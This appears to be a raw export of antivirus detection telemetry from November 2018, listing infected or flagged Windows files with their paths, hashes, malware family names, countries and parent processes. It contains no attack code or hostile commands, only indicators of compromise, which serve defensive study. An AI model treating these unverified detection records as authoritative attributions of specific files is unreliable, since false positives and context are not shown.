 [Row(detection=Row(filename='uninstall.exe', filepath='F:\\TABLET PHONE\\RGK.S4\\New folder (2)\\USB drivers_3\\USB drivers\\FlashUSB_Driver\\X64\\uninstall.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='35fa475f7cd2c806f197c0bed62b3e766e5e9ebc122140b9ba17ea43a58d151b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T02:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155850-e5bbfa04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155850-E5BBFA04', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T07:45:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku ssj2.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku SSJ2\\Goku SSJ2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='29333556b4547765d896ff32c962acf584d533e271aa086092377fa3f57b2078', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winword.exe', filepath='C:\\Program Files\\Microsoft Office\\OFFICE11\\WINWORD.EXE', filesize=12380000, name='W32/Sality.AG.#M1.#R1'), hash='6fcaf2ea71bca11d896c0810d2a5c69b029235c8a670f929e536077214243226', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T08:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='392a83aaa63c27aa6710c4c7624bd9ddcbb735873c7c108d57dca9c5c679c5a5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\lv-LV\\S-1-4-61\\Riched32.dll', filesize=512000, name='TR/AD.CoinMiner.xiiak.#M1.#R1'), hash='47498ba748a0c452242c71a35e56c68137c2d3f3148023287894870dd71886ab', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:48:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htmlwriter.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\htmlwriter\\htmlwriter.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='t_uninstall_tools.html', filepath='C:\\Program Files\\VMware\\VMware Workstation\\help\\player_win\\t_uninstall_tools.html', filesize=124000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='24042c8fcac087d8648cff3ece634b63f9f56ca880a20dc0252f49b29a544641', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T09:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='104e863b75ef04fabbb64e1d7c8e99194c968a744fe42b618b723c52786730b7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4944545\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:53:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082751-9bad34b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082751-9BAD34B0', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zauzlddkqk.exe', filepath='C:\\Program Files\\Internet Explorer\\8R66I8HFY2Z7N40\\ZAuzLDdKqK.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\Downloads\\windows-10-manager-2.3.6\\keygen\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='22b32de2316cee834cbcc73ca670056b5b82154287c40db7ba08e4461c2e66e4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\22B32DE2316CEE834CBCC73CA670056B5B82154287C40DB7BA08E4461C2E66E4', filesize=320000, name='HEUR/AGEN.1002150.#M1.#R1'), hash='22b32de2316cee834cbcc73ca670056b5b82154287c40db7ba08e4461c2e66e4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134351-92dc46e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134351-92DC46E8', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211904-2ed60b5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211853-2D8FF3F2\\AVSCAN-20181102-211904-2ED60B5E', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DE5FBAC9FDA9A5CB9195EBC9162F8101DA8C96FC2CF5FB669A905636D5A804B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0de5fbac9fda9a5cb9195ebc9162f8101da8c96fc2cf5fb669a905636d5a804b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:53:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.689\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.689\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='foxitreader530.0423 enu setup.exe', filepath='G:\\Soft All\\Reza New Soft Uisc\\Softwer\\FoxitReader530.0423 enu Setup.exe', filesize=16940000, name='W32/Sality.AT.#M1.#R1'), hash='3009149ae8492ce24430b68dccf6cce4ebccca48d2ab26927da0ce4c378c10d2', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st11topsbar.htm', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Adobe Stock Photos\\Template\\st11TopSBar.htm', filesize=232000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='3bb48cdcb3e04a662375de676bc9aa591e65634975597c49331489dab221e807', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='h:\\android\\advan s4k\\upgradedownload_r2.9.9008\\bin\\UpgradeDownload.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='0931323160a5c5c8ad68bd8d2213894d1503a31d5aca848c74b53053bb2a45ce', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:06:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_11_7_5.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_11_7_5.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='01f7693035cdb7d935a14a2f03175b764cd7742ab1331f15b62092c2476e3f74', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212431-787932d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-212258-658C136D\\AVSCAN-20181102-212431-787932D1', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201343-a2be9cf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce4c9676\\AVSCAN-20181102-201326-A0901F90\\AVSCAN-20181102-201343-A2BE9CF3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='washints.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\WASHINTS\\WASHINTS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mc_enc_pcm.dll', filepath='c:\\program files (x86)\\common files\\adobe\\dynamiclinkmediaserver\\1.0\\mc_enc_pcm.dll', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='5050888396e17ebb0daa62897d823cd982cf444549f14e630ae8a3beba5a37d8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050336-9fefce94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050336-9FEFCE94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad0d741.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\low\\rad0d741.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=302592, timestamp='2018-11-02T10:13:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193207-2967ebb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3968b8d0\\AVSCAN-20181102-193139-23792234\\AVSCAN-20181102-193207-2967EBB2', filesize=960000, name='HEUR/APC.#M1.#R1'), hash='5bf062b08aeec88d8a2a4d4026382f3775dc6ed167ca59f69626254cd0193106', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:32:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141919-89cc4761', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141919-89CC4761', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:26Z'), dt=datetime.date(2018, 11, 2)),
